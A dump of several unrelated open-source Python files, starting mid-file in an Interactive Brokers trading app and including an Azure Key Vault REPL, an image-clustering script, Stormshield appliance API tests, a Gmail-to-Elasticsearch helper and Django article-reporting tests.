dataContainerList = data
dataStructure = dataContainerList[0]
df = pd.DataFrame.from_records(astuple(o) for o in dataContainerList)
df.columns = [field.name for field in fields(dataStructure)]
df = df.set_index('date', drop=True)
return df
def makeSomeCalculations(self, df: pd.DataFrame):
# Calculate returns based on the close:
df['Returns'] = df.close.pct_change()
# Calculate some indicators:
from ta.volatility import BollingerBands # pip install --upgrade ta
# Initialize Bollinger Bands Indicator
BBBands = BollingerBands(close=df.close, n=20, ndev=2)
# Add Bollinger Bands features
df['bb_bbm'] = BBBands.bollinger_mavg()
df['bb_bbh'] = BBBands.bollinger_hband()
df['bb_bbl'] = BBBands.bollinger_lband()
self.logger.info(df)
###########################################################
def nextValidId(self, orderId: int):
'''Receives next valid order id from TWS.'''
self._nextValidOrderId = orderId
self.logger.info(f'¡Connected!')
self.logger.info(f'NextValidOrderId: {orderId}')
a = threading.active_count()
self.logger.info(f'Thread count for reference: {a}')
# Call client method:
self.reqCurrentTime()
# Get historical data:
# Request contract data:
nvidiaStock = self.createUSStockContract('NVDA', primaryExchange='NASDAQ')
self.historicalDataContainer = []
self.reqHistoricalData(reqId=self.getNextValidId(),
contract=nvidiaStock,
endDateTime='20200903 18:00:00',
durationStr='5 D',
barSizeSetting='30 mins',
whatToShow='BID',
useRTH=0,
formatDate=1,
keepUpToDate=False,
chartOptions=[])
def getNextValidId(self) -> int:
'''Get new request ID by incrementing previous one.'''
newId = self._nextValidOrderId
self._nextValidOrderId += 1
self.logger.info(f'NextValidOrderId: {newId}')
return newId
###########################################################
def createUSStockContract(self, symbol: str, primaryExchange: str):
'''Create a US Stock contract placeholder.'''
contract = Contract()
contract.symbol = symbol
contract.secType = 'STK'
contract.exchange = 'SMART'
contract.currency = 'USD'
contract.primaryExchange = primaryExchange
self.logger.info(f'Contract: {contract}')
return contract
def createFXPairContract(self, pair: str):
'''Create a FX pair contract placeholder.
Pair has to be an FX pair in the format EURUSD, GBPUSD...'''
# Separate currency and symbol:
assert len(pair) == 6
symbol = pair[:3]
currency = pair[3:]
contract = Contract()
contract.symbol = symbol
contract.secType = 'CASH'
contract.exchange = 'IDEALPRO'
contract.currency = currency
self.logger.info(f'Contract: {contract}')
return contract
def createMarketOrder(self, action: str, totalQuantity: int):
'''Create a market order.'''
order = Order()
order.action = action
order.orderType = 'MKT'
order.totalQuantity = totalQuantity
self.logger.info(f'Order: {order}')
return order
def createStopOrder(self, action: str, totalQuantity: int, stopPrice: float):
'''Create a market order.'''
order = Order()
order.action = action
order.orderType = 'STP'
order.totalQuantity = totalQuantity
order.auxPrice = stopPrice
self.logger.info(f'Order: {order}')
return order
if __name__ == "__main__":
app = AlphaApp()
app.connect('127.0.0.1', port=7497, clientId=123)
app.run()
| 9,814 |
net/sandbox.keyvault/python/repl/key_vault_repl.py
|
schaabs/sandbox
| 0 |
2169702
|
#!/usr/local/bin/python
from azure.mgmt.keyvault.models import Sku
from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters, VaultProperties, SkuName, AccessPolicyEntry, \
Permissions, KeyPermissions, SecretPermissions, CertificatePermissions
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication
from azure.keyvault.models import JsonWebKeyType
from azure.mgmt.keyvault import KeyVaultManagementClient
import json
import os
import sys
from key_vault_config import KeyVaultConfig
from key_vault_auth import KeyVaultAuth
CLIENT_ID = '8fd4d3c4-efea-49aa-b1de-2c33c22da56e' # Azure cli
CLIENT_OID = '8694d835-b4e2-419a-a315-b13c854166e2'
CLIENT_TENANT_ID = 'a7fc734e-9961-43ce-b4de-21b8b38403ba'
def _json_format(obj):
return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': '))
class KV_Repl(object):
_repl_break_commands = set(('back', 'b'))
_repl_quit_commands = set(('quit', 'q'))
def __init__(self, config):
self._auth = KeyVaultAuth(config, CLIENT_ID)
self._config = config
self._mgmt_client = KeyVaultManagementClient(self._auth.get_arm_creds(), config.subscription_id)
self._data_client = KeyVaultClient(self._auth.get_keyvault_creds())
self._selected_vault = None
self._current_index = None
def start(self):
try:
self._vault_index_loop();
except SystemExit:
print('\nuser exited\n')
def _continue_repl(self, display_action, break_commands=()):
display_action()
self._selection = input('> ').lower()
if self._selection in break_commands:
return None
elif self._selection in KV_Repl._repl_quit_commands:
sys.exit()
try:
self._selection = int(self._selection)
except ValueError:
pass
return self._selection
def _display_vault_index(self):
print('\nAvailable Vaults:\n')
self._current_index = self._get_vault_list()
for idx, vault in enumerate(self._current_index):
print('%d. %s' % (idx, vault.name))
print('\n#:select | (a)dd | (d)elete | (q)uit')
def _vault_index_loop(self):
while self._continue_repl(self._display_vault_index) is not None:
vaults = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(vaults):
self._selected_vault = self._mgmt_client.vaults.get(self._config.resource_group, vaults[i].name)
self._vault_detail_loop()
else:
print('invalid vault index')
elif self._selection == 'a' or self._selection == 'add':
self._add_vault()
else:
print('invalid input')
def _add_vault(self):
name = input('\nenter vault name:')
all_perms = Permissions()
all_perms.keys = [KeyPermissions.all]
all_perms.secrets = [SecretPermissions.all]
all_perms.certificates = [CertificatePermissions.all]
user_policy = AccessPolicyEntry(self._config.tenant_id, self._config.user_oid, all_perms)
app_policy = AccessPolicyEntry(CLIENT_TENANT_ID, CLIENT_OID, all_perms)
access_policies = [user_policy, app_policy]
properties = VaultProperties(self._config.tenant_id, Sku(name='standard'), access_policies)
properties.enabled_for_deployment = True
properties.enabled_for_disk_encryption = True
properties.enabled_for_template_deployment = True
vault = VaultCreateOrUpdateParameters(self._config.location, properties)
self._mgmt_client.vaults.create_or_update(self._config.resource_group, name, vault)
print('vault %s created\n' % name)
def _display_selected_vault_detail(self):
print('\nName:\t%s' % self._selected_vault.name)
print('Uri:\t%s' % self._selected_vault.properties.vault_uri)
print('Id:\t%s' % self._selected_vault.id)
print('\n(s)ecrets | (k)eys | (c)ertificates | (e)ncrypt | (d)ecrypt | (b)ack | (q)uit\n')
def _vault_detail_loop(self):
while self._continue_repl(self._display_selected_vault_detail, break_commands=KV_Repl._repl_break_commands) is not None:
if self._selection == 's' or self._selection == 'secrets':
self._secret_index_loop()
elif self._selection == 'k' or self._selection == 'keys':
self._key_index_loop()
elif self._selection == 'c' or self._selection == 'certificates':
print('\nnot yet implemented\n')
elif self._selection == 'e' or self._selection == 'encrypt':
self._encrypt_file()
else:
print('invalid input')
def _encrypt_file(self):
while True:
inpath = input('input file: ')
if os.path.isfile(inpath):
break
else:
print('error: file not found')
while True:
outpath = input('output file: ')
@staticmethod
def _prompt_for_file_path(prompt, verify_exists):
inpath = input(prompt)
def _display_secret_index(self):
self._current_index = []
secret_iter = self._data_client.get_secrets(self._selected_vault.properties.vault_uri)
if secret_iter is not None:
try:
self._current_index = [secret for secret in secret_iter]
except TypeError:
pass
print('\n%s Secrets:\n' % self._selected_vault.name)
for idx, s in enumerate(self._current_index):
print('%d. %s' % (idx, KV_Repl._get_name_from_url(s.id)))
print('\n#:show secret value (a)dd (d)elete (b)ack (q)uit\n')
def _secret_index_loop(self):
while self._continue_repl(self._display_secret_index, break_commands=KV_Repl._repl_break_commands) is not None:
secrets = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(secrets):
print('\n%s = %s\n' % (KV_Repl._get_secret_name_from_url(secrets[i].id), self._data_client.get_secret(secrets[i].id).value))
else:
print('invalid secret index')
elif self._selection == 'a' or self._selection == 'add':
self._add_secret()
elif self._selection == 'd' or self._selection == 'delete':
print('\nnot yet implemented\n')
def _add_secret(self):
secret_name = input('\nSecret Name: ')
secret_value = input('Secret Value: ')
self._data_client.set_secret(self._selected_vault.properties.vault_uri, secret_name, secret_value)
print('\nSecret %s added to vault %s' % (secret_name, self._selected_vault.name))
def _display_key_index(self):
self._current_index = []
key_iter = self._data_client.get_keys(self._selected_vault.properties.vault_uri)
if key_iter is not None:
try:
self._current_index = [secret for secret in key_iter]
except TypeError:
print('warning: caught TypeError')
pass
print('\n%s Keys:\n' % self._selected_vault.name)
for idx, k in enumerate(self._current_index):
print('%d. %s' % (idx, KV_Repl._get_name_from_url(k.kid)))
print('\n#:get key | (a)dd | (i)mport | (d)elete | (b)ack | (q)uit\n')
def _key_index_loop(self):
while self._continue_repl(self._display_key_index, break_commands=KV_Repl._repl_break_commands) is not None:
keys = self._current_index
if isinstance(self._selection, int):
i = self._selection
if i >= 0 and i < len(keys):
print('\n%s = %s\n' % (KV_Repl._get_secret_name_from_url(keys[i].id), self._data_client.get_secret(keys[i].id).value))
else:
print('invalid key index')
elif self._selection == 'a' or self._selection == 'add':
self._add_key()
elif self._selection == 'd' or self._selection == 'delete':
print('\nnot yet implemented\n')
def _add_key(self):
key_name = input('\nKey Name: ')
self._data_client.create_key(self._selected_vault.properties.vault_uri, key_name, kty=JsonWebKeyType.rsa.value)
print('\nSecret %s added to vault %s' % (key_name, self._selected_vault.name))
@staticmethod
def _get_name_from_url(url):
split = url.split('/')
return split[len(split) - 1]
def _get_vault_list(self):
vault_list = [vault for vault in self._mgmt_client.vaults.list()]
return vault_list
config = KeyVaultConfig()
config.from_disk()
repl = KV_Repl(config)
repl.start()
config.to_disk()
| 8,973 |
main.py
|
agb91/ImageRecognitionClusterisation
| 1 |
2168628
|
# -*- coding: cp1252 -*-
import os
from downloadImage import Download
from sqlQuery import sqlQuery
from accessoCartella import accessoCartella
from clusterizzaKMeans import clusterizzaKMeans
from clusterizzaBinario import clusterizzaBinario
from clusterizzaDBScan import clusterizzaDBScan
class Main:
def main(self):
# Dati per accesso e uso DB e tabelle
host="127.0.0.1"
user='root'
password=''
dbName="imageRecognize" # Nome del database
mainTable="mainTable"
inputTable="inputTable"
clustTable="clustTable"
imm="imm"
mn=Main()
mySql = sqlQuery()
imageFolder=accessoCartella()
mySql.createDB(host, user, password, dbName) # Crea il database se non esiste
conn = mySql.connectMySql(host, user, password, dbName) #Apertura connessione al database
if(conn!=None):
#*********************** CREAZIONE TABELLE ****************************
mySql.createMainTable(conn, mainTable)
mySql.createClustTable(conn, clustTable)
mySql.createInputTable(conn, inputTable) # Questa non dovrà essere creata da qui ma da interfaccia
"insertInputTable e updateInputTable Servono solo fintanto che manca interfaccia Web"
#toSearch="fish" # Parola da cercare
#numImm=30 # Quante immagini scaricare
#deleteSearch=0 # 0- non cancellare nulla (default); 1- cancella tutte le informazioni precedenti per una data ricerca!
#deleteAll=0 # 0- non cancellare nulla (default); 1- cancella, Database con il nome, cancella tutte le immagini nella cartella con path
#algoritmo1=1 # Uso Sift 0-NO, 1-SI
#algoritmo2=1 # Uso Shape 0-NO, 1-SI
#algoritmo3=1 # Uso Orb 0-NO, 1-SI
#selezionaClust=0 # 0: Default dv Scan, 1: KMeans, 2: Binario!
#numClassi=5 # numero di classi
#mySql.insertInputTable(conn, inputTable, toSearch, numImm, deleteSearch, deleteAll, selezionaClust, algoritmo1, algoritmo2, algoritmo3, numClassi) # Inserisce se la tabella e' appena stata creata
#mySql.updateInputTable(conn, inputTable, toSearch, numImm, deleteSearch, deleteAll, selezionaClust, algoritmo1, algoritmo2, algoritmo3, numClassi) # Aggiorna
# ********************************** LETTURA DATI DALLA TABELLA DI INPUT **********************************************************************
dataClust=mySql.readInputParams(conn, inputTable) # dataClust contiene i dati da mandare in input a clusterizza come restituiti da cursor.fetchAll
arrayDataClust=mn.fetchAllToArray(dataClust)
dataSearch=mySql.readInputDownload(conn, inputTable)# dataSearch contiene i dati da mandare in input a Download e alle varie query (dove necessario) come restituiti da cursor.fetchAll
arrayDataSearch=mn.fetchAllToArray(dataSearch)
#Assegnamento Dati Input
toSearchDownload=arrayDataSearch[0] #La parola che useremo per il download delle immagini cosi come arriva da interfaccia web
toSearch=toSearchDownload.replace(' ','_') #La parola che useremo per tutte le operazioni sul database, e la creazione delle cartelle!
numImm=arrayDataSearch[1] #Numero delle immagini da scaricare
deleteSearch=arrayDataSearch[2] # 0- non cancellare nulla (default); 1- cancella tutte le informazioni precedenti per una data ricerca!
deleteAll = arrayDataSearch[3] # 0- non cancellare nulla (default); 1- cancella, cancella righe corrispondente a toSearch da mainTable e clustTable, cancella tutte le immagini nella cartella con path (Metodo AP)
selezionaClust=arrayDataSearch[4]
PATH = os.path.abspath(os.path.join(imm, toSearch)) #PATH della cartella contenente le immagini scaricate per la parola toSearchDownload
pathImm = os.path.abspath(imm) # Path della cartella imm
print("\n\n ********************* LETTURA DATI INPUT ************************* \n")
mySql.deleteAllClustTable(conn, clustTable) # Ad ogni esecuzione svuota la clustTable
if(deleteAll>0):
mySql.deleteAllMainTable(conn, mainTable)
mySql.deleteAllClustTable(conn, clustTable)
imageFolder.cancella(pathImm)
print ("\n ************** CANCELLATO TUTTO ***************** \n")
elif(deleteSearch>0 and ((len(imageFolder.leggi(PATH))>0) or len(mySql.selectObjectMainTable(conn, mainTable, toSearch)))):
imageFolder.cancella(PATH)
mySql.deleteRowMainTable(conn, mainTable, toSearch)
print ("\n ************** CANCELLA RICERCA PRECEDENTE ***************** \n")
# Crea la cartella imm/toSearch
if not os.path.exists(PATH):
os.makedirs(PATH)
# Se la ricerca non è nella main table la inserisce con googleIndex = 0
mySql.insertMainTable(conn, mainTable, toSearch, numImm, 0, PATH)
# Se la cartella contiene meno immagini di quelle da scaricare, scarica le restanti
if(len(imageFolder.leggi(PATH))<numImm):
googleIndexArray=mn.fetchAllToArray(mySql.selectGoogleIndexMainTable(conn, mainTable, toSearch))
googleIndex=googleIndexArray[0]
scarica=Download()
googleIndex=scarica.go(toSearch, PATH, numImm, googleIndex)
mySql.updateGoogleIndexNumImmMainTable(conn, mainTable, toSearch, len(imageFolder.leggi(PATH)), googleIndex)
print ("\n\n *************************** FINE DOWNLOAD ********************************* \n\n")
"""
Se il numero di immagini nella cartella è maggiore del numero di immagini
da scaricare quando il numero di immagini da scaricare è diverso da 0
allora cancella gli elementi in eccesso!
"""
vet=imageFolder.leggi(PATH)
if(len(vet)>numImm and numImm!=0):
googleIndexArray=mn.fetchAllToArray(mySql.selectGoogleIndexMainTable(conn, mainTable, toSearch))
googleIndex=googleIndexArray[0]
googleIndex=googleIndexArray[0] - (len(vet)-numImm)
for i in range(numImm, len(vet)):
imageFolder.cancellaFile(PATH, vet[i]);
print ("\n\n ****************** IMMAGINI IN PIU' CANCELLATE *************************** \n\n")
mySql.updateGoogleIndexNumImmMainTable(conn, mainTable, toSearch, len(imageFolder.leggi(PATH)), googleIndex)
#Inserimento nella clustTable
vet=imageFolder.leggi(PATH)
if((len(vet)>0)):
for i in range (0, len(vet)):
mySql.insertInClustTable(conn, clustTable, toSearch, vet[i], '0.00','0')
#vet=imageFolder.leggi(PATH)
if (len(vet)!=0):
if(selezionaClust==0):
print("\n\n ***************** CLUSTERIZZAZIONE : DBScan *********************** \n")
cl=clusterizzaDBScan()
elif (selezionaClust==1):
print("\n\n ***************** CLUSTERIZZAZIONE : KMeans *********************** \n")
cl=clusterizzaKMeans()
else:
print("\n\n **************** CLUSTERIZZAZIONE : Binario *********************** \n")
cl=clusterizzaBinario()
allVectors=cl.clusterizza(arrayDataClust, PATH)
#allVectors contiene alla posizione: 0 - vettore nomi immagini; 1-vettore valori Rank; 2-vettore classificazione
print("\n\n **************************** FINE CLUSTERIZZAZIONE *********************** \n")
if allVectors!=None:
for i in range(0, len(allVectors[0])):
mySql.updateClustTable(conn, clustTable, toSearch, allVectors[0][i], allVectors[1][i], allVectors[2][i])
else:
print("Non ci sono immagini nella cartella!")
conn.close()
"Metodo per scrivere i riulstati dati da cursor.fetchall in un array"
def fetchAllToArray(self, fetchall):
array=[]
for row in fetchall:
for i in range(0,len(row)):
array.append(row[i])
print str(i)+"- " +str(row[i])
return array
mn=Main()
mn.main()
| 7,956 |
setup.py
|
jscheiber22/ethereum-api
| 0 |
2169508
|
from setuptools import setup, find_packages
setup(
name='ethereum-api',
version='0.1.2',
license='MIT',
description='A library to more easily work with the Ethermine pool network API.',
author='<NAME>',
author_email='<EMAIL>',
url="https://github.com/jscheiber22/ethereum-api",
packages=find_packages(include=['ethereum', 'ethereum.*'])
)
| 372 |
tests/test_format_ini.py
|
patlegu/python-SNS-API
| 9 |
2169912
|
#!/usr/bin/python
import os
import sys
import unittest
import re
from stormshield.sns.sslclient import SSLClient
APPLIANCE = os.getenv('APPLIANCE', "")
PASSWORD = os.getenv('PASSWORD', "")
@unittest.skipIf(APPLIANCE=="", "APPLIANCE env var must be set to the ip/hostname of a running SNS appliance")
@unittest.skipIf(PASSWORD=="", "PASSWORD env var must be set to the firewall password")
class TestFormatIni(unittest.TestCase):
""" Test INI format """
def setUp(self):
self.client = SSLClient(host=APPLIANCE, user='admin', password=PASSWORD, sslverifyhost=False)
self.maxDiff = 5000
def tearDown(self):
self.client.disconnect()
def test_raw(self):
""" raw format """
expected_re = """101 code=00a01000 msg="Begin" format="raw"
AUTH.*
CHPWD.*
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('HELP')
self.assertTrue(re.match(expected_re, response.output, re.MULTILINE|re.DOTALL))
self.assertEqual(response.ret, 100)
def test_section(self):
""" section format """
expected = """101 code=00a01000 msg="Begin" format="section"
[Global]
State=0
RiskHalfLife=21600
RiskTTL=86400
[Alarm]
Minor=2
Major=10
[Sandboxing]
Suspicious=2
Malicious=50
Failed=0
[Antivirus]
Infected=100
Unknown=2
Failed=0
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG HOSTREP SHOW')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
def test_section_line(self):
""" section_line format """
expected="""101 code=00a01000 msg="Begin" format="section_line"
[Result]
id=pvm_detailed type=pvm name="Detailed Vulnerability Mail"
id=pvm_summary type=pvm name="Summary Vulnerability Mail"
id=app_cert_req type=cert_req name="Accept the certificate request"
id=rej_cert_req type=cert_req name="Reject the certificate request"
id=app_user_req type=user_req name="Accept the user request"
id=rej_user_req type=user_req name="Reject the user request"
id=sponsor_req type=sponsoring name="Sponsoring request"
id=smtp_test_msg type=smtp_conf name="Test SMTP configuration"
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG COMMUNICATION EMAIL TEMPLATE LIST')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
def test_list(self):
""" list format """
expected = """101 code=00a01000 msg="Begin" format="list"
[Result]
labo_network
Network_internals
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG WEBADMIN ACCESS SHOW')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
def test_xml(self):
""" xml text output """
expected = """101 code=00a01000 msg="Begin" format="xml"
<data format="xml"><filters total_lines="5">
<separator collapse="0" color="c0c0c0" comment="Remote Management: Go to System - Configuration to setup the web administration application access" first_ruleid="1" nb_elements="2" position="1" />
<filter action="pass" comment="Admin from everywhere" index="1" position="2" status="active" type="local_filter_slot"><noconnlog disk="0" ipfix="0" syslog="0" /><from><target type="any" value="any" /></from><to><port type="single" value="firewall_srv" /><port type="single" value="https" /><target type="group" value="firewall_all" /></to></filter>
<filter action="pass" comment="Allow Ping from everywhere" icmp_code="0" icmp_type="8" index="2" ipproto="icmp" position="3" proto="none" status="active" type="local_filter_slot"><noconnlog disk="0" ipfix="0" syslog="0" /><from><target type="any" value="any" /></from><to><target type="group" value="firewall_all" /></to></filter>
<separator collapse="0" color="c0c0c0" comment="Default policy" first_ruleid="3" nb_elements="1" position="4" />
<filter action="block" comment="Block all" index="3" position="5" status="active" type="local_filter_slot"><noconnlog disk="0" ipfix="0" syslog="0" /><from><target type="any" value="any" /></from><to><target type="any" value="any" /></to></filter>
</filters>
</data>
100 code=00a00100 msg="Ok\""""
response = self.client.send_command('CONFIG FILTER EXPLICIT index=1 type=filter output=xml')
self.assertEqual(response.output, expected)
self.assertEqual(response.ret, 100)
if __name__ == '__main__':
unittest.main()
| 4,458 |
higgins/automation/google/gmail.py
|
bfortuner/higgins
| 0 |
2169926
|
"""Query, Search, Parse Emails from Gmail.
TODO: Paginate over large requests. Right now it will timeout trying to download 1000s of emails.
Setup instructions here: https://github.com/jeremyephron/simplegmail
1. Create/reuse a google cloud project
2. Enable the Gmail API https://developers.google.com/workspace/guides/create-project?authuser=1#enable-api
3. Enable OAuth sign-in
4. Create credentials and download the client_secret.json file into repo root
https://developers.google.com/gmail/api/quickstart/python
"""
from typing import Dict, List
import dateutil
import elasticsearch
import elasticsearch_dsl
import pytz
from simplegmail import Gmail
from simplegmail.message import Message
from simplegmail.query import construct_query
import traceback
from higgins.automation.email import email_model, email_utils
from higgins.nlp import html2plain
def send_email(
to: str,
sender: str,
subject: str,
body_html: str = None,
body_plain: str = None,
cc: List[str] = None,
bcc: List[str] = None,
attachments: List[str] = None,
) -> Dict:
assert body_html is not None or body_plain is not None
client = Gmail()
params = {
"recipient": to,
"sender": sender,
"cc": cc,
"bcc": bcc,
"subject": subject,
"msg_html": body_html, # "<h1>Woah, my first email!</h1><br />This is an HTML email.",
"msg_plain": body_plain,
"attachments": attachments, # ["path/to/something/cool.pdf", "path/to/image.jpg", "path/to/script.py"],
"signature": True, # use my account signature
}
message = client.send_message(
**params
) # equivalent to send_message(to="<EMAIL>", sender=...)
return message
def get_emails():
client = Gmail()
# Unread messages in your inbox
messages = client.get_unread_inbox()
print(f"You have {len(messages)} unread messages.")
# Starred messages
# messages = client.get_starred_messages()
# ...and many more easy to use functions can be found in gmail.py!
# Print them out!
for message in messages[:2]:
print("To: " + message.recipient)
print("From: " + message.sender)
print("Subject: " + message.subject)
print("Date: " + message.date)
print("Preview: " + message.snippet)
print("Message Body: " + message.plain) # or message.html
def get_email(email_id: str, user_id: str = "me", include_html: bool = True) -> Dict:
client = Gmail()
message = client._build_message_from_ref(user_id="me", message_ref={"id": email_id})
return convert_message_to_dict(message, include_html)
def search_emails(
query_dicts: List[Dict], limit: int = 100, include_html: bool = False
) -> List[Dict]:
"""Search emails given queries.
Args:
query_dicts: List of email query parameters
limit: Maximum number of emails to return
Returns:
List of dictionaries with email body and metadata
Example: Return messages that are either:
- newer than 2 days old, unread, labeled "Finance" or both "Homework" and "CS"
OR
- newer than 1 month old, unread, labeled "Top Secret", but not starred.
query_dicts = [
{
"newer_than": (2, "day"),
"unread": True,
"labels":[["Finance"], ["Homework", "CS"]]
},
{
"newer_than": (1, "month"),
"unread": True,
"labels": ["Top Secret"],
"exclude_starred": True
}
]
"""
print(f"Searching emails with query {query_dicts}")
for dct in query_dicts:
dct = format_terms(dct)
client = Gmail()
# TODO: Add INBOX labels, Sent, etc
# Get your available labels
# User labels:
# Label(name='CHAT', id='CHAT'),
# Label(name='SENT', id='SENT'),
# Label(name='INBOX', id='INBOX'),
# Label(name='IMPORTANT', id='IMPORTANT'),
# Label(name='TRASH', id='TRASH'),
# Label(name='DRAFT', id='DRAFT'),
# Label(name='SPAM', id='SPAM'),
# Label(name='CATEGORY_FORUMS', id='CATEGORY_FORUMS'),
# Label(name='CATEGORY_UPDATES', id='CATEGORY_UPDATES'),
# Label(name='CATEGORY_PERSONAL', id='CATEGORY_PERSONAL'),
# Label(name='CATEGORY_PROMOTIONS', id='CATEGORY_PROMOTIONS'),
# Label(name='CATEGORY_SOCIAL', id='CATEGORY_SOCIAL'),
# Label(name='STARRED', id='STARRED'),
# Label(name='UNREAD', id='UNREAD'),
# Label(name='[Imap]/Drafts', id='Label_1'),
# Label(name='Urgent', id='Label_10'),
# Label(name='[Imap]/Sent', id='Label_2'),
# Label(name='craigslist', id='Label_2858204817852213362'),
# Label(name='[Imap]/Trash', id='Label_3'),
# Label(name='Notes', id='Label_4'),
# Label(name='Personal', id='Label_5'),
# Label(name='Receipts', id='Label_6'),
# Label(name='Work', id='Label_8'),
# Label(name='TODO', id='Label_8430892267769255145'),
# Label(name='Sent Messages', id='Label_9')]
labels = client.list_labels()
print("USR LABELS", labels)
# print(f"User labels: {labels}")
query = construct_query(*query_dicts)
print(query)
messages = client.get_messages(query=query)
print(f"Query returned {len(messages)} messages")
emails = []
for message in messages[:limit]:
try:
email = convert_message_to_dict(message, include_html)
emails.append(email)
except Exception as e:
print(e)
print(traceback.format_exc())
return emails
def convert_message_to_dict(message: Message, include_html: bool = False) -> Dict:
sender_name, sender_address = email_utils.normalize_email_address(message.sender)
# For now, set everything to pacific time
date = dateutil.parser.parse(message.date, ignoretz=True, fuzzy=True)
date = pytz.timezone("US/Pacific").localize(date)
email = {
"recipient": message.recipient,
"sender": message.sender,
"sender_name": sender_name,
"sender_address": sender_address,
"subject": message.subject,
"date": date,
"preview": message.snippet,
"google_id": message.id,
"thread_id": message.thread_id,
"label_ids": [label.name for label in message.label_ids],
"plain": extract_plain_text(message),
"html": None,
"markdown": None,
}
if bool(message.html):
html_extracts = html2plain.parse_html(message.html)
email["html"] = html_extracts["simplified"]
email["plain"] = html_extracts["text"]
email["markdown"] = html_extracts["markdown"]
if not include_html:
email["html"] = None
return email
def extract_plain_text(message: Message) -> str:
plain = ""
if bool(message.html):
# plain = email_utils.parse_html_v2(message.html)
plain = email_utils.parse_html_v3(message.html)
elif bool(message.plain):
plain = message.plain
plain = email_utils.clean_email_body(plain)
return plain
def format_terms(terms: Dict) -> Dict:
# Bug in library. If unread=False, it behaves as unread=True
if "unread" in terms and not terms["unread"]:
del terms["unread"]
if "read" in terms and not terms["read"]:
del terms["read"]
return terms
def gmail_to_elastic(query: Dict, limit: int = 100):
"""Load emails from Gmail API query into Elasticsearch."""
messages = search_emails(query_dicts=[query], limit=limit)
from tqdm import tqdm
for dct in tqdm(messages):
dct["email_id"] = email_utils.hash_email(dct)
email = email_model.from_gmail_dict(dct)
email.save()
# TODO: Add Bulk support
# conn = elasticsearch_dsl.connections.get_connection()
# elasticsearch.helpers.bulk(conn, (d.to_dict(True) for d in docs))
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
def search_elastic_emails(query: Dict):
client = Elasticsearch()
s = Search(using=client, index="email")
resp = s.execute()
print(f"Hits: {resp.hits.total.value}")
def update_local_emails():
# Update local emails to have new HTML preprocessing
emails = email_utils.search_local_emails([], dataset_dir="data/emails")
for email in emails:
google_email = get_email(email["google_id"])
email_utils.save_email(google_email, labels=email.get("model_labels"))
if __name__ == "__main__":
# msg = send_email(
# to="<EMAIL>",
# sender="<EMAIL>",
# subject="Hello Brendan",
# body_plain="This is an email body"
# )
# print(msg)
# get_emails()
# messages = search_emails(
# [
# dict(
# sender="<EMAIL>",
# newer_than=(10, "day"),
# # unread=None,
# labels=["INBOX"],
# # exact_phrase=None,
# # subject=None,
# )
# ]
# )
messages = gmail_to_elastic(
query=dict(
recipient="<EMAIL>",
newer_than=(365, "day"),
exclude_labels=[["promotions"], ["social"], ["forums"]],
# google supports these labels in queries:
# finance, purchases, updates, travel, social, promotions, inbox
),
limit=100000,
)
# search_elastic_emails({})
# update_local_emails()
| 9,337 |
authors/apps/articles/tests/test_report_article.py
|
andela/ah-backend-summer
| 1 |
2169751
|
from django.urls import reverse
from rest_framework import status
from authors.apps.authentication.models import User
from authors.apps.articles.models import Report
from ...authentication.tests.base_class import BaseTest
from .test_data.report_article_data import *
class TestReportArticle(BaseTest):
def setUp(self):
super().setUp()
self.user = self.activated_user()
self.article = self.create_article(self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': self.article.slug})
self.reports_url = reverse('articles:reports')
def create_article_using_different_user(self):
"""
create_article_using_different_user creates an article using a
different user
"""
user = User.objects.create_user(username='oma',
email='<EMAIL>',
password='<PASSWORD>')
return self.create_article(user)
def report_an_article(self):
"""
report_an_article creates a report
"""
article = self.create_article_using_different_user()
return Report.objects.create(reporter=self.user.profile,
article=article,
reason="okay")
def create_admin(self):
"""
create_admin creates a superuser
"""
return User.objects.create_superuser(username='admin',
email='<EMAIL>',
password='<PASSWORD>')
def test_user_cannot_report_article_which_does_not_exist(self):
"""
Tests that a user cannot report an article that does not exist
"""
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': 'jfdsgga'})
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(response.data["message"],
"The article you're trying to report does not exist")
def test_user_cannot_report_their_article(self):
"""
Tests that a user cannot report their article
"""
self.client.force_authenticate(user=self.user)
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(response.data["message"],
"You cannot report your own article")
def test_same_user_cannot_report_same_article_twice(self):
"""
Tests that a user cannot report the same article twice
"""
article = self.create_article_using_different_user()
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': article.slug})
self.client.post(self.url, data=valid_report_article_data)
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code,
status.HTTP_422_UNPROCESSABLE_ENTITY)
self.assertEqual(response.data["message"],
"You already reported this article")
def test_user_can_report_an_article(self):
"""
Tests that a user can report an article
"""
article = self.create_article_using_different_user()
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': article.slug})
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["message"],
f"You have reported this article {article.title}")
def test_user_cannot_report_an_article_when_unauthenticated(self):
"""
Tests that a user cannot report an article unless they are logged in
"""
response = self.client.post(self.url, data=valid_report_article_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_user_cannot_report_an_article_without_reason(self):
"""
Tests user cannot report an article without a reason
"""
article = self.create_article_using_different_user()
self.client.force_authenticate(user=self.user)
self.url = reverse('articles:report-article',
kwargs={'slug': article.slug})
response = self.client.post(self.url, data=no_reason_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
